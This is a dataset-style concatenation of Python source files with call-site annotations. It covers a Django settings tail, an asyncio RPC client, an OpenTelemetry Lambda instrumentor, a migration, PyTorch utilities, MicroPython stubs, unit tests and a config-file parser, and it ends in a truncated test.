MEDIAFILES_LOCATION = 'media'
[((25, 0, 25, 30), 'os.environ.update', 'os.environ.update', ({(25, 18, 25, 29): 'CONFIG_DATA'}, {}), '(CONFIG_DATA)', False, 'import os\n'), ((84, 27, 84, 62), 'os.environ.get', 'os.environ.get', ({(84, 42, 84, 61): '"""AWS_ACCESS_KEY_ID"""'}, {}), "('AWS_ACCESS_KEY_ID')", False, 'import os\n'), ((85, 27, 85, 66), 'os.environ.get', 'os.environ.get', ({(85, 42, 85, 65): '"""AWS_SECRET_ACCESS_KEY"""'}, {}), "('AWS_SECRET_ACCESS_KEY')", False, 'import os\n'), ((86, 27, 86, 68), 'os.environ.get', 'os.environ.get', ({(86, 42, 86, 67): '"""AWS_STORAGE_BUCKET_NAME"""'}, {}), "('AWS_STORAGE_BUCKET_NAME')", False, 'import os\n'), ((87, 27, 87, 69), 'os.environ.get', 'os.environ.get', ({(87, 42, 87, 68): '"""AWS_S3_SIGNATURE_VERSION"""'}, {}), "('AWS_S3_SIGNATURE_VERSION')", False, 'import os\n'), ((88, 27, 88, 63), 'os.environ.get', 'os.environ.get', ({(88, 42, 88, 62): '"""AWS_S3_REGION_NAME"""'}, {}), "('AWS_S3_REGION_NAME')", False, 'import os\n'), ((143, 23, 143, 88), 'firebase_admin.credentials.Certificate', 'credentials.Certificate', ({(143, 47, 143, 87): 'BASE_DIR + firebase_service_account_path'}, {}), '(BASE_DIR + firebase_service_account_path)', False, 'from firebase_admin import credentials\n'), ((144, 0, 144, 51), 'firebase_admin.initialize_app', 'firebase_admin.initialize_app', ({(144, 30, 144, 50): 'FIREBASE_CREDENTIALS'}, {}), '(FIREBASE_CREDENTIALS)', False, 'import firebase_admin\n'), ((182, 18, 182, 41), 'os.environ.get', 'os.environ.get', ({(182, 33, 182, 40): '"""EMAIL"""'}, {}), "('EMAIL')", False, 'import os\n'), ((183, 21, 183, 44), 'os.environ.get', 'os.environ.get', ({(183, 36, 183, 43): '"""EMAIL"""'}, {}), "('EMAIL')", False, 'import os\n'), ((184, 22, 184, 54), 'os.environ.get', 'os.environ.get', ({(184, 37, 184, 53): '"""EMAIL_PASSWORD"""'}, {}), "('EMAIL_PASSWORD')", False, 'import os\n'), ((19, 43, 19, 68), 'os.path.abspath', 'os.path.abspath', ({(19, 59, 19, 67): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((125, 21, 125, 54), 'os.environ.get', 'os.environ.get', ({(125, 36, 125, 53): '"""DATABASE_ENGINE"""'}, {}), "('DATABASE_ENGINE')", False, 'import os\n'), ((126, 21, 126, 52), 'os.environ.get', 'os.environ.get', ({(126, 36, 126, 51): '"""DATABASE_NAME"""'}, {}), "('DATABASE_NAME')", False, 'import os\n'), ((127, 21, 127, 52), 'os.environ.get', 'os.environ.get', ({(127, 36, 127, 51): '"""DATABASE_USER"""'}, {}), "('DATABASE_USER')", False, 'import os\n'), ((128, 21, 128, 56), 'os.environ.get', 'os.environ.get', ({(128, 36, 128, 55): '"""DATABASE_PASSWORD"""'}, {}), "('DATABASE_PASSWORD')", False, 'import os\n'), ((129, 21, 129, 52), 'os.environ.get', 'os.environ.get', ({(129, 36, 129, 51): '"""DATABASE_HOST"""'}, {}), "('DATABASE_HOST')", False, 'import os\n'), ((130, 21, 130, 52), 'os.environ.get', 'os.environ.get', ({(130, 36, 130, 51): '"""DATABASE_PORT"""'}, {}), "('DATABASE_PORT')", False, 'import os\n'), ((133, 22, 133, 55), 'os.environ.get', 'os.environ.get', ({(133, 37, 133, 54): '"""DATABASE_ENGINE"""'}, {}), "('DATABASE_ENGINE')", False, 'import os\n')]
urands/aiorpcgrid
aiorpcgrid/client.py
7bc9ee9a80fa843998b2604d7c0803b323628480
import asyncio # from aiorpcgrid.client import Client from aiorpcgrid.task import AsyncTask, State class AsyncClient: _provider = None _method = None _requests: dict = {} _running = True _request_queue: asyncio.Queue = asyncio.Queue() _loop = None def __init__(self, provider, loop=None): self._provider = provider if loop is None: loop = asyncio.get_event_loop() self._loop = loop async def open(self): await self._provider.open() asyncio.ensure_future(self.request_loop(), loop=self._loop) asyncio.ensure_future(self.run(), loop=self._loop) return self async def close(self): self._running = False await self._provider.close() await self._request_queue.put(None) async def request_loop(self): while self._running: task = await self._request_queue.get() if task is not None: await self.provider.call_method(task) task.status = State.RUNNING if self._request_queue.empty(): self._request_queue.task_done() async def run(self): while self._running: responses = await self._provider.recv() if responses is not None: for response in responses: if response.id in self._requests: task = self._requests[response.id] task.result = response.result task.error = response.error if task.error is None: self._requests[ response.id ].status = State.COMPLETED else: self._requests[response.id].status = State.FAILED task.event.set() del self._requests[response.id] if task._callback is not None: asyncio.ensure_future( task.callback(task), loop=self._loop ) def __call__(self, *args, **kwargs): if not self.provider.is_connected(): raise ConnectionError(f'Connection lost. {self._provider}') task = AsyncTask().create(self._method, *args, **kwargs) if 'parallel' in kwargs: task._parallel = kwargs['parallel'] self._method = None task.status = State.PENDING self._requests[task.id] = task self._request_queue.put_nowait(self._requests[task.id]) return self._requests[task.id]
[((12, 36, 12, 51), 'asyncio.Queue', 'asyncio.Queue', ({}, {}), '()', False, 'import asyncio\n'), ((18, 19, 18, 43), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ({}, {}), '()', False, 'import asyncio\n'), ((67, 15, 67, 26), 'aiorpcgrid.task.AsyncTask', 'AsyncTask', ({}, {}), '()', False, 'from aiorpcgrid.task import AsyncTask, State\n')]
matt-tyler/opentelemetry-lambda
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
6b427d351fa721620fcd387e836e9f2f9f20cb60
# Copyright 2020, OpenTelemetry Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # TODO: usage """ The opentelemetry-instrumentation-aws-lambda package allows tracing AWS Lambda function. Usage ----- .. code:: python # Copy this snippet into AWS Lambda function # Ref Doc: https://docs.aws.amazon.com/lambda/latest/dg/lambda-python.html import boto3 from opentelemetry.instrumentation.aws_lambda import ( AwsLambdaInstrumentor ) # Enable instrumentation AwsLambdaInstrumentor().instrument() # Lambda function def lambda_handler(event, context): s3 = boto3.resource('s3') for bucket in s3.buckets.all(): print(bucket.name) return "200 OK" API --- """ import logging import os from importlib import import_module from wrapt import wrap_function_wrapper # TODO: aws propagator from opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format import ( AwsXRayFormat, ) from opentelemetry.instrumentation.aws_lambda.version import __version__ from opentelemetry.instrumentation.instrumentor import BaseInstrumentor from opentelemetry.instrumentation.utils import unwrap from opentelemetry.trace import SpanKind, get_tracer, get_tracer_provider logger = logging.getLogger(__name__) class AwsLambdaInstrumentor(BaseInstrumentor): def _instrument(self, **kwargs): self._tracer = get_tracer(__name__, __version__, kwargs.get("tracer_provider")) self._tracer_provider = get_tracer_provider() lambda_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER")) wrapped_names = lambda_handler.rsplit(".", 1) self._wrapped_module_name = wrapped_names[0] self._wrapped_function_name = wrapped_names[1] wrap_function_wrapper( self._wrapped_module_name, self._wrapped_function_name, self._functionPatch, ) def _uninstrument(self, **kwargs): unwrap( import_module(self._wrapped_module_name), self._wrapped_function_name, ) def _functionPatch(self, original_func, instance, args, kwargs): lambda_context = args[1] ctx_aws_request_id = lambda_context.aws_request_id ctx_invoked_function_arn = lambda_context.invoked_function_arn orig_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER")) # TODO: enable propagate from AWS by env variable xray_trace_id = os.environ.get("_X_AMZN_TRACE_ID", "") lambda_name = os.environ.get("AWS_LAMBDA_FUNCTION_NAME") function_version = os.environ.get("AWS_LAMBDA_FUNCTION_VERSION") propagator = AwsXRayFormat() parent_context = propagator.extract({"X-Amzn-Trace-Id": xray_trace_id}) with self._tracer.start_as_current_span( name=orig_handler, context=parent_context, kind=SpanKind.SERVER ) as span: # Refer: https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/faas.md#example span.set_attribute("faas.execution", ctx_aws_request_id) span.set_attribute("faas.id", ctx_invoked_function_arn) # TODO: fix in Collector because they belong resource attrubutes span.set_attribute("faas.name", lambda_name) span.set_attribute("faas.version", function_version) result = original_func(*args, **kwargs) # force_flush before function quit in case of Lambda freeze. self._tracer_provider.force_flush() return result
[((62, 9, 62, 36), 'logging.getLogger', 'logging.getLogger', ({(62, 27, 62, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((69, 32, 69, 53), 'opentelemetry.trace.get_tracer_provider', 'get_tracer_provider', ({}, {}), '()', False, 'from opentelemetry.trace import SpanKind, get_tracer, get_tracer_provider\n'), ((76, 8, 80, 9), 'wrapt.wrap_function_wrapper', 'wrap_function_wrapper', ({(77, 12, 77, 37): 'self._wrapped_module_name', (78, 12, 78, 39): 'self._wrapped_function_name', (79, 12, 79, 31): 'self._functionPatch'}, {}), '(self._wrapped_module_name, self.\n _wrapped_function_name, self._functionPatch)', False, 'from wrapt import wrap_function_wrapper\n'), ((95, 24, 95, 62), 'os.environ.get', 'os.environ.get', ({(95, 39, 95, 57): '"""_X_AMZN_TRACE_ID"""', (95, 59, 95, 61): '""""""'}, {}), "('_X_AMZN_TRACE_ID', '')", False, 'import os\n'), ((97, 22, 97, 64), 'os.environ.get', 'os.environ.get', ({(97, 37, 97, 63): '"""AWS_LAMBDA_FUNCTION_NAME"""'}, {}), "('AWS_LAMBDA_FUNCTION_NAME')", False, 'import os\n'), ((98, 27, 98, 72), 'os.environ.get', 'os.environ.get', ({(98, 42, 98, 71): '"""AWS_LAMBDA_FUNCTION_VERSION"""'}, {}), "('AWS_LAMBDA_FUNCTION_VERSION')", False, 'import os\n'), ((100, 21, 100, 36), 'opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format.AwsXRayFormat', 'AwsXRayFormat', ({}, {}), '()', False, 'from opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format import AwsXRayFormat\n'), ((71, 56, 71, 82), 'os.environ.get', 'os.environ.get', ({(71, 71, 71, 81): '"""_HANDLER"""'}, {}), "('_HANDLER')", False, 'import os\n'), ((84, 12, 84, 52), 'importlib.import_module', 'import_module', ({(84, 26, 84, 51): 'self._wrapped_module_name'}, {}), '(self._wrapped_module_name)', False, 'from importlib import import_module\n'), ((92, 54, 92, 80), 'os.environ.get', 'os.environ.get', ({(92, 69, 92, 79): '"""_HANDLER"""'}, {}), "('_HANDLER')", False, 'import os\n')]
bastoune57/gokiting_back_end
instructors/migrations/0021_alter_user_avatar_url.py
f3edcbeede292713349b28f2390b5d57e1420f8e
# Generated by Django 4.0.2 on 2022-04-01 16:09 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('instructors', '0020_alter_user_description_alter_user_title'), ] operations = [ migrations.AlterField( model_name='user', name='avatar_url', field=models.ImageField(default='profile_pics/einstein_EqBibwO.jpeg', upload_to='profile_pics'), ), ]
[((16, 18, 16, 107), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n')]
SamplingAndEnsemblingSolvers/SamplingAndEnsemblingSolvers
sopa/src/models/utils.py
5ad3cae76c3cc9cec4d347807012e61121ea61b9
import numpy as np import torch import random from .odenet_mnist.layers import MetaNODE def fix_seeds(seed=502): np.random.seed(seed) random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed_all(seed) torch.set_printoptions(precision=10) torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False class RunningAverageMeter(object): """Computes and stores the average and current value""" def __init__(self, momentum=0.99): self.momentum = momentum self.reset() def reset(self): self.val = None self.avg = 0 def update(self, val): if self.val is None: self.avg = val else: self.avg = self.avg * self.momentum + val * (1 - self.momentum) self.val = val def load_model(path): (_, state_dict), (_, model_args), (_, slover_id) = torch.load(path, map_location='cpu').items() is_odenet = model_args.network == 'odenet' if not hasattr(model_args, 'in_channels'): model_args.in_channels = 1 model = MetaNODE(downsampling_method=model_args.downsampling_method, is_odenet=is_odenet, in_channels=model_args.in_channels) model.load_state_dict(state_dict) return model, model_args
[((8, 4, 8, 24), 'numpy.random.seed', 'np.random.seed', ({(8, 19, 8, 23): 'seed'}, {}), '(seed)', True, 'import numpy as np\n'), ((9, 4, 9, 21), 'random.seed', 'random.seed', ({(9, 16, 9, 20): 'seed'}, {}), '(seed)', False, 'import random\n'), ((10, 4, 10, 27), 'torch.manual_seed', 'torch.manual_seed', ({(10, 22, 10, 26): 'seed'}, {}), '(seed)', False, 'import torch\n'), ((11, 4, 11, 36), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', ({(11, 31, 11, 35): 'seed'}, {}), '(seed)', False, 'import torch\n'), ((12, 4, 12, 40), 'torch.set_printoptions', 'torch.set_printoptions', (), '', False, 'import torch\n'), ((37, 55, 37, 91), 'torch.load', 'torch.load', (), '', False, 'import torch\n')]
TheVinhLuong102/micropy-stubs
packages/micropython-official/v1.10/esp32/stubs/ubinascii.py
55ff1773008f7c4dfc3d70a403986486226eb6b3
""" Module: 'ubinascii' on esp32 1.10.0 """ # MCU: (sysname='esp32', nodename='esp32', release='1.10.0', version='v1.10 on 2019-01-25', machine='ESP32 module with ESP32') # Stubber: 1.2.0 def a2b_base64(): pass def b2a_base64(): pass def crc32(): pass def hexlify(): pass def unhexlify(): pass
[]
chenwang/QuantEcon.lectures.code
jv/test_jv.py
8832a74acd219a71cb0a99dc63c5e976598ac999
""" @author : Spencer Lyon """ from __future__ import division import sys import unittest from nose.plugins.skip import SkipTest from jv import JvWorker from quantecon import compute_fixed_point from quantecon.tests import get_h5_data_file, write_array, max_abs_diff # specify params -- use defaults A = 1.4 alpha = 0.6 beta = 0.96 grid_size = 50 if sys.version_info[0] == 2: v_nm = "V" else: # python 3 raise SkipTest("Python 3 tests aren't ready.") v_nm = "V_py3" def _new_solution(jv, f, grp): "gets new solution and updates data file" V = _solve_via_vfi(jv) write_array(f, grp, V, v_nm) return V def _solve_via_vfi(jv): "compute policy rules via value function iteration" v_init = jv.x_grid * 0.6 V = compute_fixed_point(jv.bellman_operator, v_init, max_iter=3000, error_tol=1e-5) return V def _get_vf_guess(jv, force_new=False): with get_h5_data_file() as f: # See if the jv group already exists group_existed = True try: jv_group = f.getNode("/jv") except: # doesn't exist group_existed = False jv_group = f.create_group("/", "jv", "data for jv.py tests") if force_new or not group_existed: # group doesn't exist, or forced to create new data. # This function updates f in place and returns v_vfi, c_vfi, c_pfi V = _new_solution(jv, f, jv_group) return V # if we made it here, the group exists and we should try to read # existing solutions try: # Try reading vfi if sys.version_info[0] == 2: V = jv_group.V[:] else: # python 3 V = jv_group.V_py3[:] except: # doesn't exist. Let's create it V = _new_solution(jv, f, jv_group) return V class TestJvWorkder(unittest.TestCase): @classmethod def setUpClass(cls): jv = JvWorker(A=A, alpha=alpha, beta=beta, grid_size=grid_size) cls.jv = jv # compute solution v_init = _get_vf_guess(jv) cls.V = compute_fixed_point(jv.bellman_operator, v_init) cls.s_pol, cls.phi_pol = jv.bellman_operator(cls.V * 0.999, return_policies=True) def test_low_x_prefer_s(self): "jv: s preferred to phi with low x?" # low x is an early index self.assertGreaterEqual(self.s_pol[0], self.phi_pol[0]) def test_high_x_prefer_phi(self): "jv: phi preferred to s with high x?" # low x is an early index self.assertGreaterEqual(self.phi_pol[-1], self.s_pol[-1]) def test_policy_sizes(self): "jv: policies correct size" n = self.jv.x_grid.size self.assertEqual(self.s_pol.size, n) self.assertEqual(self.phi_pol.size, n) def test_bellman_sol_fixed_point(self): "jv: solution to bellman is fixed point" new_V = self.jv.bellman_operator(self.V) self.assertLessEqual(max_abs_diff(new_V, self.V), 1e-4)
[((23, 10, 23, 50), 'nose.plugins.skip.SkipTest', 'SkipTest', ({(23, 19, 23, 49): '"""Python 3 tests aren\'t ready."""'}, {}), '("Python 3 tests aren\'t ready.")', False, 'from nose.plugins.skip import SkipTest\n'), ((30, 4, 30, 32), 'quantecon.tests.write_array', 'write_array', ({(30, 16, 30, 17): 'f', (30, 19, 30, 22): 'grp', (30, 24, 30, 25): 'V', (30, 27, 30, 31): 'v_nm'}, {}), '(f, grp, V, v_nm)', False, 'from quantecon.tests import get_h5_data_file, write_array, max_abs_diff\n'), ((38, 8, 40, 43), 'quantecon.compute_fixed_point', 'compute_fixed_point', (), '', False, 'from quantecon import compute_fixed_point\n'), ((45, 9, 45, 27), 'quantecon.tests.get_h5_data_file', 'get_h5_data_file', ({}, {}), '()', False, 'from quantecon.tests import get_h5_data_file, write_array, max_abs_diff\n'), ((83, 13, 83, 71), 'jv.JvWorker', 'JvWorker', (), '', False, 'from jv import JvWorker\n'), ((88, 16, 88, 64), 'quantecon.compute_fixed_point', 'compute_fixed_point', ({(88, 36, 88, 55): 'jv.bellman_operator', (88, 57, 88, 63): 'v_init'}, {}), '(jv.bellman_operator, v_init)', False, 'from quantecon import compute_fixed_point\n'), ((111, 29, 111, 56), 'quantecon.tests.max_abs_diff', 'max_abs_diff', ({(111, 42, 111, 47): 'new_V', (111, 49, 111, 55): 'self.V'}, {}), '(new_V, self.V)', False, 'from quantecon.tests import get_h5_data_file, write_array, max_abs_diff\n')]
LaudateCorpus1/excentury
excentury/command/config.py
8d0f20bb3e543382170e042fac51a56377c4024b
"""Config This module is in charge of providing all the necessary settings to the rest of the modules in excentury. """ import os import re import sys import textwrap import argparse from collections import OrderedDict from excentury.command import error, trace, import_mod DESC = """Edit a configuration file for excentury. Some actions performed by excentury can be overwritten by using configuration files. To see the values that the configuration file can overwrite use the `defaults` command. This will print a list of the keys and values excentury uses for the given command. """ RE = re.compile(r'\${(?P<key>.*?)}') RE_IF = re.compile( r'(?P<iftrue>.*?) IF\[\[(?P<cond>.*?)\]\]' ) RE_IFELSE = re.compile( r'(?P<iftrue>.*?) IF\[\[(?P<cond>.*?)\]\]ELSE (?P<iffalse>.*)' ) def disp(msg): """Wrapper around sys.stdout.write which is meant to behave as the print function but it does not add the newline character. """ sys.stdout.write(msg) def _replacer(*key_val): """Helper function for replace. Source: <http://stackoverflow.com/a/15221068/788553> """ replace_dict = dict(key_val) replacement_function = lambda match: replace_dict[match.group(0)] pattern = re.compile("|".join([re.escape(k) for k, _ in key_val]), re.M) return lambda string: pattern.sub(replacement_function, string) def replace(string, *key_val): """Replacement of strings done in one pass. Example: >>> replace("a < b && b < c", ('<', '&lt;'), ('&', '&amp;')) 'a &lt; b &amp;&amp; b &lt; c' Source: <http://stackoverflow.com/a/15221068/788553> """ return _replacer(*key_val)(string) class ConfigDispAction(argparse.Action): # pylint: disable=R0903 """Derived argparse Action class to use when displaying the configuration file and location.""" def __call__(self, parser, namespace, values, option_string=None): try: read_config(namespace) except IOError: disp('xcpp.config not found in %r\n' % namespace.cfg) else: disp('path to xcpp.config: "%s"\n' % namespace.cfg) with open('%s/xcpp.config' % namespace.cfg, 'r') as _fp: disp(_fp.read()) exit(0) def add_parser(subp, raw): "Add a parser to the main subparser. " tmpp = subp.add_parser('config', help='configure excentury', formatter_class=raw, description=textwrap.dedent(DESC)) tmpp.add_argument('var', type=str, nargs='?', default=None, help='Must be in the form of sec.key') tmpp.add_argument('-v', action='store_true', help='print config file location') tmpp.add_argument('--print', action=ConfigDispAction, nargs=0, help='print config file and exit') def _get_replacements(tokens, data, sec): """Helper function for _read_config. """ replacements = list() for token in tokens: if ':' in token: tsec, tkey = token.split(':') tval = '' if tsec in data: if tkey in data[tsec]: tval = data[tsec][tkey] else: if token in data[sec]: tval = data[sec][token] else: tval = '' replacements.append( ('${%s}' % token, tval) ) return replacements # pylint: disable=invalid-name # ARG and CFG are names that may be used in the configuration file. # ARG gives us access to the command line arguments and CFG gives us # access to the current configuration. Note that using CFG[key][sec] # is equivalent to ${key:sec}. These names go against the convention # so that they may be easy to spot in a configuration file. def _eval_condition(cond, ARG, CFG, line_num, fname): """Evaluates a string using the eval function. It prints a warning if there are any errors. Returns the result of the evaluation and an error number: 0 if everything is fine, 1 if there was an error. """ ARG.FILEPATH = '%s/%s/%s' % (ARG.cfg, CFG['xcpp']['path'], ARG.inputfile) try: # pylint: disable=eval-used # To be able to evaluate a condition without creating a whole # new parser we can use the eval function. We could have use # a python file as a configuration but then there would be # no simple structure to the files. cond = eval(cond) enum = 0 # pylint: disable=broad-except # Anything can go wrong during the execution of the `eval` # function. For this reason we must try to catch anything that # may come our way so that we may give out a warning message # and ignore it. except Exception as exception: cond = None enum = 1 trace( 'WARNING: error in line %d of %r: %s\n' % ( line_num, fname, exception.message ) ) return cond, enum def _read_config(fname, arg): """Simple parser to read configuration files. """ data = OrderedDict() sec = None line_num = 0 with open(fname, 'r') as fhandle: for line in fhandle: line_num += 1 if line[0] == '[': sec = line[1:-2] data[sec] = OrderedDict() elif '=' in line: tmp = line.split('=', 1) key = tmp[0].strip() val = tmp[1].strip() val = os.path.expandvars(val) replacements = _get_replacements( RE.findall(val), data, sec ) # pylint: disable=star-args if replacements: val = replace(val, *replacements) match = RE_IFELSE.match(val) if match: cond, enum = _eval_condition( match.group('cond'), arg, data, line_num, fname ) if enum == 1: continue groups = match.groups() val = groups[0] if cond else groups[2] else: match = RE_IF.match(val) if match: cond, enum = _eval_condition( match.group('cond'), arg, data, line_num, fname ) if enum == 1: continue if cond: val = match.group('iftrue') else: continue data[sec][key] = val return data def read_config(arg): """Read the configuration file xcpp.config""" path = arg.cfg if path == '.' and not os.path.exists('xcpp.config'): if 'XCPP_CONFIG_PATH' in os.environ: tmp_path = os.environ['XCPP_CONFIG_PATH'] if os.path.exists('%s/xcpp.config' % tmp_path): trace("Configured with: '%s/xcpp.config'\n" % tmp_path) path = tmp_path elif not os.path.exists('%s/xcpp.config' % path): error("ERROR: %s/xcpp.config does not exist\n" % path) arg.cfg = path try: config = _read_config('%s/xcpp.config' % path, arg) except IOError: config = OrderedDict() return config def run(arg): """Run command. """ config = read_config(arg) if arg.v: disp('path to xcpp.config: "%s"\n' % arg.cfg) if arg.var is None: for sec in config: disp('[%s]\n' % sec) for key in config[sec]: disp(' %s = %s\n' % (key, config[sec][key])) disp('\n') return try: command, var = arg.var.split('.', 1) except ValueError: error("ERROR: '%s' is not of the form sec.key\n" % arg.var) try: disp(config[command][var]+'\n') except KeyError: pass return def _update_single(cfg, name, defaults=None): "Helper function for get_cfg." if defaults: for var, val in defaults.iteritems(): cfg[name][var] = os.path.expandvars(str(val)) else: mod = import_mod('excentury.command.%s' % name) if hasattr(mod, "DEFAULTS"): for var, val in mod.DEFAULTS.iteritems(): cfg[name][var] = os.path.expandvars(val) def _update_from_file(cfg, name, cfg_file): "Helper function for get_cfg." if name in cfg_file: for var, val in cfg_file[name].iteritems(): cfg[name][var] = os.path.expandvars(val) def _update_from_arg(cfg, argdict, key): "Helper function for get_cfg." for var in cfg[key]: if var in argdict and argdict[var] is not None: cfg[key][var] = argdict[var] def get_cfg(arg, names, defaults=None): """Obtain the settings for a command. """ cfg = { 'xcpp': { 'root': '.', 'path': '.' } } cfg_file = read_config(arg) if 'xcpp' in cfg_file: for var, val in cfg_file['xcpp'].iteritems(): cfg['xcpp'][var] = os.path.expandvars(val) cfg['xcpp']['root'] = arg.cfg if isinstance(names, list): for name in names: cfg[name] = dict() _update_single(cfg, name) _update_from_file(cfg, name, cfg_file) else: if names != 'xcpp': cfg[names] = dict() _update_single(cfg, names, defaults) _update_from_file(cfg, names, cfg_file) argdict = vars(arg) if arg.parser_name in cfg: _update_from_arg(cfg, argdict, arg.parser_name) elif arg.parser_name == 'to' and arg.lang in cfg: _update_from_arg(cfg, argdict, arg.lang) _update_from_arg(cfg, argdict, 'xcpp') return cfg
[((27, 5, 27, 36), 're.compile', 're.compile', ({(27, 16, 27, 35): '"""\\\\${(?P<key>.*?)}"""'}, {}), "('\\\\${(?P<key>.*?)}')", False, 'import re\n'), ((28, 8, 30, 1), 're.compile', 're.compile', ({(29, 4, 29, 46): '"""(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]"""'}, {}), "('(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]')", False, 'import re\n'), ((31, 12, 33, 1), 're.compile', 're.compile', ({(32, 4, 32, 66): '"""(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]ELSE (?P<iffalse>.*)"""'}, {}), "('(?P<iftrue>.*?) IF\\\\[\\\\[(?P<cond>.*?)\\\\]\\\\]ELSE (?P<iffalse>.*)')", False, 'import re\n'), ((39, 4, 39, 25), 'sys.stdout.write', 'sys.stdout.write', ({(39, 21, 39, 24): 'msg'}, {}), '(msg)', False, 'import sys\n'), ((153, 11, 153, 24), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((246, 14, 246, 55), 'excentury.command.import_mod', 'import_mod', ({(246, 25, 246, 54): "'excentury.command.%s' % name"}, {}), "('excentury.command.%s' % name)", False, 'from excentury.command import error, trace, import_mod\n'), ((84, 39, 84, 60), 'textwrap.dedent', 'textwrap.dedent', ({(84, 55, 84, 59): 'DESC'}, {}), '(DESC)', False, 'import textwrap\n'), ((143, 8, 147, 9), 'excentury.command.trace', 'trace', ({(144, 12, 146, 13): "('WARNING: error in line %d of %r: %s\\n' % (line_num, fname, exception.message)\n )"}, {}), "('WARNING: error in line %d of %r: %s\\n' % (line_num, fname, exception\n .message))", False, 'from excentury.command import error, trace, import_mod\n'), ((201, 27, 201, 56), 'os.path.exists', 'os.path.exists', ({(201, 42, 201, 55): '"""xcpp.config"""'}, {}), "('xcpp.config')", False, 'import os\n'), ((204, 15, 204, 58), 'os.path.exists', 'os.path.exists', ({(204, 30, 204, 57): "('%s/xcpp.config' % tmp_path)"}, {}), "('%s/xcpp.config' % tmp_path)", False, 'import os\n'), ((207, 13, 207, 52), 'os.path.exists', 'os.path.exists', ({(207, 28, 207, 51): "('%s/xcpp.config' % path)"}, {}), "('%s/xcpp.config' % path)", False, 'import os\n'), ((208, 8, 208, 62), 'excentury.command.error', 'error', ({(208, 14, 208, 61): "('ERROR: %s/xcpp.config does not exist\\n' % path)"}, {}), "('ERROR: %s/xcpp.config does not exist\\n' % path)", False, 'from excentury.command import error, trace, import_mod\n'), ((213, 17, 213, 30), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((232, 8, 232, 67), 'excentury.command.error', 'error', ({(232, 14, 232, 66): '("ERROR: \'%s\' is not of the form sec.key\\n" % arg.var)'}, {}), '("ERROR: \'%s\' is not of the form sec.key\\n" % arg.var)', False, 'from excentury.command import error, trace, import_mod\n'), ((256, 29, 256, 52), 'os.path.expandvars', 'os.path.expandvars', ({(256, 48, 256, 51): 'val'}, {}), '(val)', False, 'import os\n'), ((277, 31, 277, 54), 'os.path.expandvars', 'os.path.expandvars', ({(277, 50, 277, 53): 'val'}, {}), '(val)', False, 'import os\n'), ((49, 35, 49, 47), 're.escape', 're.escape', ({(49, 45, 49, 46): 'k'}, {}), '(k)', False, 'import re\n'), ((161, 28, 161, 41), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((205, 16, 205, 71), 'excentury.command.trace', 'trace', ({(205, 22, 205, 70): '("Configured with: \'%s/xcpp.config\'\\n" % tmp_path)'}, {}), '("Configured with: \'%s/xcpp.config\'\\n" % tmp_path)', False, 'from excentury.command import error, trace, import_mod\n'), ((249, 33, 249, 56), 'os.path.expandvars', 'os.path.expandvars', ({(249, 52, 249, 55): 'val'}, {}), '(val)', False, 'import os\n'), ((166, 22, 166, 45), 'os.path.expandvars', 'os.path.expandvars', ({(166, 41, 166, 44): 'val'}, {}), '(val)', False, 'import os\n')]
pkjmesra/nseta
tests/test_urls.py
28cd8cede465efe9f506a38c5933602c463e5185
# -*- coding: utf-8 -*- ''' Created on Thu Nov 19 20:52:33 2015 @author: SW274998 ''' from nseta.common.commons import * import datetime import unittest import time from bs4 import BeautifulSoup from tests import htmls import json import requests import six from nseta.common.urls import * import nseta.common.urls as urls from six.moves.urllib.parse import urlparse from baseUnitTest import baseUnitTest class TestUrls(baseUnitTest): def setUp(self, redirect_logs=True): super().setUp() proxy_on = False if proxy_on: urls.session.proxies.update({'http': 'proxy1.wipro.com:8080'}) def runTest(self): for key in TestUrls.__dict__.keys(): if key.find('test') == 0: TestUrls.__dict__[key](self) def test_get_symbol_count(self): count = get_symbol_count(symbol='SBIN') self.assertEqual(count, '1') force_count = get_symbol_count(symbol='SBIN', force_refresh=True) self.assertEqual(force_count, '1') def test_equity_history_url(self): sym_count = get_symbol_count(symbol='SBIN') txt = 'Data for SBIN - EQ' resp = equity_history_url(symbol='SBIN', symbolCount=sym_count, series='EQ', fromDate='01-01-2000', toDate='10-01-2000', dateRange='') self.assertGreaterEqual(resp.text.find(txt), 0, resp.text) def test_nse_intraday_url(self): txt = 'date|g1_o|g1_h|g1_l|g1_c|g2|g2_CUMVOL' #'<columns><column>date</column><column>pltp</column><column>nltp</column><column>previousclose</column><column>allltp</column>' resp = nse_intraday_url(CDSymbol='SBIN', Periodicity='1') self.assertIn(txt, resp.text) def test_price_list_url(self): resp = price_list_url('2019', 'DEC', '31DEC2019') csv = unzip_str(resp.content) self.assertGreaterEqual(csv.find('SBIN'), 0) def tests_daily_volatility_url(self): resp = daily_volatility_url('19112015') self.assertGreaterEqual(resp.text.find('SBIN'), 0) def test_pr_price_list_zipped_url(self): resp = pr_price_list_zipped_url('191115') csv = unzip_str(resp.content) def test_index_history_url(self): resp 